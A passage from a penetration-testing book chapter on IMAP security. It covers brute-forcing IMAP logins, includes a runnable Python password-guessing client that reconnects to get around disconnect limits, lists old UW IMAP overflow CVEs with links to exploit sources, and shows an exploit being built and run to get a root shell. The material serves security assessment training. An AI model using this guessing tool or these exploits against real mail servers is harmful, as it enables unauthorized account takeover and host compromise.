10.4 IMAP


Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143 (IMAP over SSL/TLS uses TCP port 993). The IMAP protocol is much like POP-3: a user authenticates with a plaintext network service and can then collect and manage their email, the difference being that with IMAP the mailbox stays on the server and is manipulated in place.

Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) invented and maintains IMAP; the current revision of the protocol is IMAP4rev1, defined in RFC 3501.

10.4.1 IMAP Brute Force

As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus (a Win32 GUI tool) and Hydra (Unix-based) do an excellent job of brute-forcing valid user-account passwords. As mentioned earlier, they can be downloaded from:

http://www.hoobie.net/brutus/brutus-download.html
http://www.thc.org/releases.php

Like POP-3, IMAP services are notoriously susceptible to brute-force password-grinding attacks because they typically enforce no account lockout policy and often don't log unsuccessful authentication attempts, so an attacker can work through a large password list against each account with little risk of detection.
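The LOGIN exchange that Brutus and Hydra automate, as an added example (this is not the book's code and not either tool): a minimal tagged-command IMAP client that walks a password list for one account over a single connection, reconnecting when the server drops it after a few failures, exercised against a small in-process fake IMAP server so it runs offline. The host, account name, greeting banner, the three-failure disconnect and the candidate list are all constructed for illustration; the fake server implements only LOGIN and LOGOUT.

```python
"""IMAP LOGIN password guessing over one connection, run against an in-process
fake IMAP server.  Added example, not code from the book; the account, banner,
failure limit and candidate passwords below are constructed for illustration."""
import shlex
import socket
import socketserver
import threading

# Constructed data for the fake server: one valid account and a UW-IMAP-style greeting.
FAKE_ACCOUNTS = {"alice": "letmein"}
FAKE_BANNER = b"* OK example.org IMAP4rev1 2004.357 at Mon, 3 Mar 2003 13:16:02 (PST)\r\n"
FAKE_MAX_FAILURES = 3   # assumption: the fake drops the connection after three failed LOGINs


class FakeImapHandler(socketserver.StreamRequestHandler):
    """Answers LOGIN and LOGOUT with RFC 3501 tagged responses; nothing more."""

    def handle(self):
        self.wfile.write(FAKE_BANNER)
        failures = 0
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            try:
                parts = shlex.split(raw.decode("ascii", "replace"))  # handles "quoted strings"
            except ValueError:
                parts = []
            tag = parts[0] if parts else "*"
            cmd = parts[1].upper() if len(parts) > 1 else ""
            if cmd == "LOGIN" and len(parts) == 4:
                if FAKE_ACCOUNTS.get(parts[2]) == parts[3]:
                    self.wfile.write(f"{tag} OK LOGIN completed\r\n".encode())
                else:
                    failures += 1
                    self.wfile.write(f"{tag} NO LOGIN failed\r\n".encode())
                    if failures >= FAKE_MAX_FAILURES:
                        self.wfile.write(b"* BYE Too many login failures\r\n")
                        return
            elif cmd == "LOGOUT":
                self.wfile.write(f"* BYE\r\n{tag} OK LOGOUT completed\r\n".encode())
                return
            else:
                self.wfile.write(f"{tag} BAD command not understood\r\n".encode())


def start_fake_server():
    """Bind the fake server to an ephemeral loopback port and serve it from a daemon thread."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeImapHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def imap_quote(value):
    """Encode a string as an RFC 3501 quoted string so spaces and quotes survive."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


class ImapClient:
    """Minimal IMAP client: connect, keep the untagged greeting, send tagged commands."""

    def __init__(self, host, port, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.stream = self.sock.makefile("rwb")
        self.banner = self._readline()   # "* OK ..." greeting; usually names the server software
        self.seq = 0

    def _readline(self):
        raw = self.stream.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        return raw.decode("ascii", "replace").rstrip("\r\n")

    def command(self, text):
        """Send one tagged command and return its tagged status: OK, NO or BAD."""
        self.seq += 1
        tag = f"a{self.seq:03d}"
        self.stream.write(f"{tag} {text}\r\n".encode())
        self.stream.flush()
        while True:                      # skip untagged "*" lines until our tag is answered
            line = self._readline()
            if line.startswith(tag + " "):
                return line.split(" ", 2)[1]

    def login(self, user, password):
        return self.command(f"LOGIN {imap_quote(user)} {imap_quote(password)}") == "OK"

    def close(self):
        self.stream.close()
        self.sock.close()


def guess_password(host, port, user, candidates):
    """Try each candidate for user; reconnect if the server drops us after too many failures.
    Returns (greeting banner, password found or None, number of LOGIN attempts made)."""
    client = ImapClient(host, port)
    banner, attempts, found = client.banner, 0, None
    for candidate in candidates:
        attempts += 1
        try:
            ok = client.login(user, candidate)
        except ConnectionError:          # dropped mid-run: a fresh connection resets the server's count
            client = ImapClient(host, port)
            ok = client.login(user, candidate)
        if ok:
            found = candidate
            break
    try:
        client.command("LOGOUT")
    except ConnectionError:
        pass
    client.close()
    return banner, found, attempts


if __name__ == "__main__":
    srv = start_fake_server()
    fake_host, fake_port = srv.server_address
    print(guess_password(fake_host, fake_port, "alice", ["password", "123456", "qwerty", "letmein"]))
    srv.shutdown()
    srv.server_close()
```

The greeting is kept because the untagged "* OK" line usually identifies the server software and version, which is what you compare against a vulnerability list before deciding between password grinding and an exploit. The reconnect path matters in practice: a disconnect after a few failed LOGINs is the only limit many servers impose, and reopening the connection resets it, which is exactly why the lack of a lockout policy makes this attack cheap. After a test run against a real target, check its mail and auth logs to confirm whether the failed attempts were recorded at all.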

10.4.2 IMAP Process Manipulation Attacks

Since 1997, a handful of remotely exploitable security vulnerabilities in IMAP2bis and IMAP4rev1 services have been publicized; they are summarized in Table 10-5.

Table 10-5. Remotely exploitable IMAP vulnerabilities

CVE name        Date         Notes
CVE-1999-0005   17/07/1998   Washington University IMAP 4 (IMAP4rev1 10.234) and prior AUTHENTICATE command overflow
CVE-1999-0042   02/03/1997   Washington University IMAP 4.1beta and prior LOGIN command overflow
CVE-2000-0233   27/03/2000   SuSE Linux IMAP server allows remote attackers to bypass IMAP authentication and gain privileges
CVE-2000-0284   16/04/2000   Washington University IMAP 4.7 (IMAP4rev1 12.264) post-authentication LIST command overflow
CVE-2002-0379   10/05/2002   Washington University IMAP 2000c and prior post-authentication BODY command overflow

The serious unauthenticated vulnerabilities in IMAP services are the two overflows, CVE-1999-0005 (AUTHENTICATE) and CVE-1999-0042 (LOGIN); CVE-2000-0233 is also reachable without credentials but is specific to the SuSE Linux package, and the LIST and BODY overflows require a valid login first. Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:

http://adm.freelsd.net/ADM/exploits/imap.c
http://packetstormsecurity.org/0004-exploits/solx86-imapd.c
http://packetstormsecurity.org/9902-exploits/imapx.c
http://packetstormsecurity.org/new-exploits/imapd-ex.c

The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz.

After finding the correct offset to use with the exploit script (the second argument to imaps in the listing), it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11.

Example 10-11. The IMAP2bis LOGIN command overflow in action
# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz
# tar xfz imaps.tar.gz
# cd imaps
# make
cc -O2 -o imaps imaps.c
imaps.c: In function `imap':
imaps.c:35: warning: function returns address of local variable
# ls
hey.sh  imaps*  imaps.c  include/  makefile  other/  readme
# ./imaps 192.168.0.35 100
Connecting to 192.168.0.35 on port 143.
* OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02
id;
uid=0(root) gid=0(root) groups=0(root)


Source: Network Security Assessment: Know Your Network, Chris McNab (ISBN 059600611X, 2006).
